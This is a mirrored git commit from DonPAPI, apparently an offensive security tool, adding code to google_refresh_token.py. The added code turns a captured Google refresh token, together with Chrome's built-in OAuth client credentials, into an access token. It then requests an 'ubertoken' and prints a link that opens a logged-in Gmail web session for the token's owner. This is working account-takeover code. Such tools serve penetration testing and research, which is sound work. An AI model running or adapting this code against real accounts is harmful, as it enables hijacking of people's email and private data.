RepoMirrors
/
DonPAPI
mirror of https://github.com/login-securite/DonPAPI
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

from refresh token to cookie

This commit is contained in:
ThePirateWhoSmellsOfSunflowers 2024-04-15 17:00:25 +02:00
parent 81ee86b9bb
commit 143f52215d
1 changed files with 66 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
donpapi/lib/google_refresh_token.py
View File

@ -29,6 +29,16 @@ def refreshToken(client_id, client_secret, refresh_token):
else: else:
return None return None
def get_token_info(id_token):
endpoint = "https://oauth2.googleapis.com/tokeninfo?id_token={}"
r = requests.get(endpoint.format(id_token))
debugprint("[-] Raw response: {}".format(r.text))
if r.ok:
print("[+] Get valid access_token for {}\n".format(r.json()['email']))
else:
print("[x] Error")
debugprint(r.text)
def refreshToken2(client_id, client_secret, refresh_token): def refreshToken2(client_id, client_secret, refresh_token):
params = { params = {
"grant_type": "refresh_token", "grant_type": "refresh_token",
@ -40,11 +50,12 @@ def refreshToken2(client_id, client_secret, refresh_token):
authorization_url = "https://www.googleapis.com/oauth2/v4/token" authorization_url = "https://www.googleapis.com/oauth2/v4/token"
r = requests.post(authorization_url, data=params) r = requests.post(authorization_url, data=params)
print(r.content) debugprint("[-] Raw response: {}".format(r.text))
if r.ok: if r.ok:
print(f"access_token:{r.json()['access_token']}") debugprint(f"[-] access_token: {r.json()['access_token']}")
print(f"scope:{r.json()['scope']}") debugprint(f"[-] scope: {r.json()['scope']}")
print(f"id_token:{r.json()['id_token']}") debugprint(f"[-] id_token: {r.json()['id_token']}")
get_token_info(r.json()['id_token'])
return r.json()['access_token'] return r.json()['access_token']
else: else:
return None return None
@ -55,6 +66,19 @@ def get_decryption_key():
#https://www.bitdefender.com/blog/businessinsights/the-chain-reaction-new-methods-for-extending-local-breaches-in-google-workspace/ #https://www.bitdefender.com/blog/businessinsights/the-chain-reaction-new-methods-for-extending-local-breaches-in-google-workspace/
return 1 return 1
def get_ubertoken(access_token):
# https://gist.github.com/arirubinstein/fd5453537436a8757266f908c3e41538#code
endpoint = "https://www.google.com/accounts/OAuthLogin?source=ChromiumBrowser&issueuberauth=1"
target = "https://accounts.google.com/TokenAuth?auth={}&service=mail&continue=http://mail.google.com/mail"
headers = {"Authorization": "Bearer {}".format(access_token)}
r = requests.get(endpoint, headers=headers)
if r.ok:
return target.format(r.text)
else:
debugprint("[x] Error when requesting ubertoken")
debugprint(r.text)
return None
def main(): def main():
@ -68,12 +92,18 @@ def main():
sys.exit(1) sys.exit(1)
options = parser.parse_args() options = parser.parse_args()
global debugprint
debugprint = print if options.debug else lambda *a, **k: None
client_id = '77185425430.apps.googleusercontent.com' client_id = '77185425430.apps.googleusercontent.com'
client_secret = 'OTJgUOQcT7lO7GsGZq2G4IlT' client_secret = 'OTJgUOQcT7lO7GsGZq2G4IlT'
refresh_token = options.token refresh_token = options.token
rt=refreshToken2(client_id, client_secret, refresh_token) access_token = refreshToken2(client_id, client_secret, refresh_token)
print(f'{rt}') print(f'[+] Access_token: {access_token}\n')
return rt ubertoken = get_ubertoken(access_token)
print(f'[+] Click on this link to get a websession for this user: {ubertoken}\n')
return access_token
if __name__ == "__main__": if __name__ == "__main__":